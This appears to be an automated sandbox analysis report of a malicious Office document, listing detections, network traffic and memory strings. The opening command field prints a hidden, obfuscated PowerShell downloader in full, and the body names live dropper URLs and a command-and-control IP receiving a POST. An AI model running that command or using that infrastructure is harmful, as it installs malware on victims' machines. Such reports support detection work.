                      Source: Process startedAuthor: Florian Roth, Markus Neis: Data: Command: powershell -w hidden -enc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArACcAbgBkADoALwAnACkAKwAnAC8AJwArACgAJwBlAC0AJwArACcAd

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Antivirus detection for URL or domainShow sources
                      Source: http://nightlifemumbai.club/x/0wBD3/Avira URL Cloud: Label: malware
                      Source: https://shop.nowfal.dev/wp-includes/RlMObf2j0/Avira URL Cloud: Label: malware
                      Source: https://jflmktg.wpcomstaging.com/wp-content/AK/Avira URL Cloud: Label: malware
                      Source: https://shop.nowfal.devAvira URL Cloud: Label: malware
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dllJoe Sandbox ML: detected

                      Compliance:

                      barindex
                      Uses insecure TLS / SSL version for HTTPS connectionShow sources
                      Source: unknownHTTPS traffic detected: 104.21.88.166:443 -> 192.168.2.22:49166 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 212.227.200.73:443 -> 192.168.2.22:49168 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 192.0.78.20:443 -> 192.168.2.22:49169 version: TLS 1.0
                      Uses new MSVCR DllsShow sources
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Binary contains paths to debug symbolsShow sources
                      Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
                      Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
                      Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
                      Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2327249466.0000000002A60000.00000002.00000001.sdmp
                      Source: Binary string: <ystem.pdb source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                      Source: global trafficDNS query: name: nightlifemumbai.club
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.88.166:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.217.6.174:80

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2404322 ET CNC Feodo Tracker Reported CnC Server TCP group 12 192.168.2.22:49171 -> 190.55.186.229:80
                      Potential dropper URLs found in powershell memoryShow sources
                      Source: powershell.exe, 00000005.00000002.2331398510.0000000003A86000.00000004.00000001.sdmpString found in memory: http://nightlifemumbai.club/x/0wBD3/!https://shop.nowfal.dev/wp-includes/RlMObf2j0/!http://e-wdesign.eu/wp-content/bn1IgDejh/!http://traumfrauen-ukraine.de/bin/JyeS/!https://jflmktg.wpcomstaging.com/wp-content/AK/!https://linhkienmaytinh.tctedu.com/wp-snapshots/VzJM/
                      Source: powershell.exe, 00000005.00000002.2335494858.000000001D367000.00000002.00000001.sdmpString found in memory: Ease of Access Centero<a href="http://go.microsoft.com/fwlink/?linkid=63345">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63353">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63363">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63367">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63370">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63373">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63376">Learn about additional assistive technologies online</a>PA!Make your computer easier to use.BGet recommendations to make your computer easier to use (eyesight)CGet recommendations to make your computer easier to use (dexterity)AGet recommendations to make your computer easier to use (hearing)
                      Source: powershell.exe, 00000005.00000002.2335494858.000000001D367000.00000002.00000001.sdmpString found in memory: Get recommendations to make your computer easier to use (speech)CGet recommendations to make your computer easier to use (cognitive)"Use the computer without a display
                      Source: powershell.exe, 00000005.00000002.2335494858.000000001D367000.00000002.00000001.sdmpString found in memory: normal/http://images.metaservices.microsoft.com/cover/6http://redir.metaservices.microsoft.com/redir/buynow/?1http://redir.metaservices.microsoft.com/dvdcover/PA6http://redir.metaservices.microsoft.com/redir/buynow/?,http://windowsmedia.com/redir/findmedia.asp?9http://redir.metaservices.microsoft.com/redir/getmdrdvd/?8http://redir.metaservices.microsoft.com/redir/getmdrcd/?Bhttp://redir.metaservices.microsoft.com/redir/getmdrcdbackground/??http://redir.metaservices.microsoft.com/redir/getmdrcdposturl/?Ihttp://redir.metaservices.microsoft.com/redir/getmdrcdposturlbackground/?=http://redir.metaservices.microsoft.com/redir/getdaiposturl/?:http://redir.metaservices.microsoft.com/redir/daifailure/?
                      Source: powershell.exe, 00000005.00000002.2335494858.000000001D367000.00000002.00000001.sdmpString found in memory: Microsoft Corporation/(C) Microsoft Corporation. All rights reserved.9http://redir.metaservices.microsoft.com/redir/submittoc/?-http://windowsmedia.com/redir/QueryTOCExt.asp1res://wmploc.dll/Offline_MediaInfo_NowPlaying.htm7http://redir.metaservices.microsoft.com/redir/buynowmg/,http://windowsmedia.com/redir/buyticket9.asp)http://windowsmedia.com/redir/IDPPage.asp)http://windowsmedia.com/redir/IDPLogo.asp
                      Source: powershell.exe, 00000005.00000002.2335494858.000000001D367000.00000002.00000001.sdmpString found in memory: AMG Rating: %s stars:http://redir.metaservices.microsoft.com/redir/mediaguide/?9http://redir.metaservices.microsoft.com/redir/radiotuner/,http://windowsmedia.com/redir/QueryTOCNP.asp#Show Video and Visualization Window9http://redir.metaservices.microsoft.com/redir/dvddetails/9http://redir.metaservices.microsoft.com/redir/dvdwizard/?PA
                      Source: powershell.exe, 00000005.00000002.2335494858.000000001D367000.00000002.00000001.sdmpString found in memory: Do you want to switch to it now?
                      Source: powershell.exe, 00000005.00000002.2335494858.000000001D367000.00000002.00000001.sdmpString found in memory: http://www.microsoft.com/windows/windowsmedia/musicservices.aspx?http://redir.metaservices.microsoft.com/redir/allservices/?sv=2?http://redir.metaservices.microsoft.com/redir/allservices/?sv=3?http://redir.metaservices.microsoft.com/redir/allservices/?sv=5PA
                      Source: powershell.exe, 00000005.00000002.2334898273.000000001D180000.00000002.00000001.sdmpString found in memory: Autoplay,http://go.microsoft.com/fwlink/?LinkId=30564-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=131536-http://go.microsoft.com/fwlink/?LinkId=131535+http://go.microsoft.com/fwlink/?LinkId=8430
                      Source: powershell.exe, 00000005.00000002.2334898273.000000001D180000.00000002.00000001.sdmpString found in memory: PRODUCT_KEY_PROBLEMS$ACTIVATION_TYPE_KEY_FIND_PRODUCT_KEY)ACTIVATION_TYPE_DIFF_KEY_FIND_PRODUCT_KEY+ACTIVATION_CHNG_TO_LICENSE_FIND_PRODUCT_KEYPA,ACTIVATION_PERIOD_EXPIRED_WHAT_IS_ACTIVATION-ACTIVATION_LICENSE_EXPIRED_WHAT_IS_ACTIVATION,ACTIVATION_LICENSE_EXPIRED_PRIVACY_STATEMENTPA,http://go.microsoft.com/fwlink/?LinkID=90983-http://go.microsoft.com/fwlink/?LinkId=123784PA$E77344FA-E978-464C-953E-EBA44F0522670ACTIVATION_ERROR_INSTALLING_REINSTALLING_WINDOWS$f3b8150b-0bd1-4fec-8283-7a1dd45c16377ACTIVATION_ERROR_REINSTALL_WINDOWS_CREATE_RESTORE_POINTPA-http://go.microsoft.com/fwlink/?LinkId=100109-http://go.microsoft.com/fwlink/?LinkId=100096-http://go.microsoft.com/fwlink/?LinkId=120830-http://go.microsoft.com/fwlink/?LinkId=120831,http://go.microsoft.com/fwlink/?LinkId=89429
                      Source: global trafficHTTP traffic detected: GET /x/0wBD3/ HTTP/1.1Host: nightlifemumbai.clubConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /bin/JyeS/ HTTP/1.1Host: traumfrauen-ukraine.deConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 212.227.200.73 212.227.200.73
                      Source: Joe Sandbox ViewIP Address: 190.55.186.229 190.55.186.229
                      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                      Source: Joe Sandbox ViewASN Name: AUTOMATTICUS AUTOMATTICUS
                      Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
                      Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                      Source: global trafficHTTP traffic detected: POST /pvaadnb3/ HTTP/1.1DNT: 0Referer: 190.55.186.229/pvaadnb3/Content-Type: multipart/form-data; boundary=------------JavqSYlmrOTCUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.55.186.229Content-Length: 5508Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownHTTPS traffic detected: 104.21.88.166:443 -> 192.168.2.22:49166 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 212.227.200.73:443 -> 192.168.2.22:49168 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 192.0.78.20:443 -> 192.168.2.22:49169 version: TLS 1.0
                      Source: unknownTCP traffic detected without corresponding DNS query: 190.55.186.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 190.55.186.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 190.55.186.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 190.55.186.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 190.55.186.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 190.55.186.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 190.55.186.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 190.55.186.229
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{24864F20-30CA-4646-ACFF-79FC9E14ADCB}.tmpJump to behavior
                      Source: global trafficHTTP traffic detected: GET /x/0wBD3/ HTTP/1.1Host: nightlifemumbai.clubConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /bin/JyeS/ HTTP/1.1Host: traumfrauen-ukraine.deConnection: Keep-Alive
                      Source: powershell.exe, 00000005.00000002.2334898273.000000001D180000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2335074733.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2331258105.0000000001DC0000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                      Source: powershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                      Source: unknownDNS traffic detected: queries for: nightlifemumbai.club
                      Source: unknownHTTP traffic detected: POST /pvaadnb3/ HTTP/1.1DNT: 0Referer: 190.55.186.229/pvaadnb3/Content-Type: multipart/form-data; boundary=------------JavqSYlmrOTCUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.55.186.229Content-Length: 5508Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1569Date: Mon, 25 Jan 2021 19:10:44 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: powershell.exe, 00000005.00000003.2325890478.000000001D051000.00000004.00000001.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=
                      Source: powershell.exe, 00000005.00000003.2325890478.000000001D051000.00000004.00000001.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0
                      Source: powershell.exe, 00000005.00000002.2334418584.000000001CF9B000.00000004.00000001.sdmpString found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
                      Source: powershell.exe, 00000005.00000002.2326597229.0000000001ECE000.00000004.00000001.sdmpString found in binary or memory: http://ca.sia.it/seccli/repository/CRL.der0J
                      Source: powershell.exe, 00000005.00000003.2325975821.000000001D133000.00000004.00000001.sdmpString found in binary or memory: http://ca.sia.it/secsrv/repository/CRL.der0J
                      Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
                      Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/EncryptionEverywhereDVTLSCA-G1.crt0
                      Source: powershell.exe, 00000005.00000003.2326018353.000000001CFE9000.00000004.00000001.sdmpString found in binary or memory: http://certificates.starfieldtech.com/repository/1604
                      Source: powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
                      Source: powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/publicnotaryroot.html0
                      Source: powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
                      Source: powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/publicnotaryroot.crl0
                      Source: powershell.exe, 00000005.00000002.2334453493.000000001CFB8000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                      Source: powershell.exe, 00000005.00000002.2334750882.000000001D05F000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                      Source: powershell.exe, 00000005.00000002.2334509027.000000001CFD8000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
                      Source: powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/TrustedCertificateServices.crl0:
                      Source: powershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                      Source: powershell.exe, 00000005.00000002.2326644631.0000000001F69000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                      Source: powershell.exe, 00000005.00000003.2325986641.0000000001FA7000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                      Source: powershell.exe, 00000005.00000003.2325986641.0000000001FA7000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: powershell.exe, 00000005.00000003.2325961794.000000001CFF5000.00000004.00000001.sdmpString found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
                      Source: powershell.exe, 00000005.00000003.2325955165.000000001CFD4000.00000004.00000001.sdmpString found in binary or memory: http://crl.oces.certifikat.dk/oces.crl0
                      Source: powershell.exe, 00000005.00000002.2334526019.000000001CFE3000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.wellsfargo.com/wsprca.crl0
                      Source: powershell.exe, 00000005.00000003.2325986641.0000000001FA7000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                      Source: powershell.exe, 00000005.00000003.2325986641.0000000001FA7000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                      Source: powershell.exe, 00000005.00000003.2325909543.000000001CFDE000.00000004.00000001.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
                      Source: powershell.exe, 00000005.00000003.2325961794.000000001CFF5000.00000004.00000001.sdmpString found in binary or memory: http://crl.ssc.lt/root-b/cacrl.crl0
                      Source: powershell.exe, 00000005.00000002.2334526019.000000001CFE3000.00000004.00000001.sdmpString found in binary or memory: http://crl.ssc.lt/root-c/cacrl.crl0
                      Source: powershell.exe, 00000005.00000003.2325955165.000000001CFD4000.00000004.00000001.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
                      Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
                      Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0L
                      Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
                      Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
                      Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
                      Source: powershell.exe, 00000005.00000002.2326330204.00000000001B2000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                      Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: powershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabT6_v
                      Source: powershell.exe, 00000005.00000002.2331518603.0000000003BB2000.00000004.00000001.sdmpString found in binary or memory: http://e-wdesign.eu
                      Source: powershell.exe, 00000005.00000002.2331398510.0000000003A86000.00000004.00000001.sdmpString found in binary or memory: http://e-wdesign.eu/wp-content/bn1IgDejh/
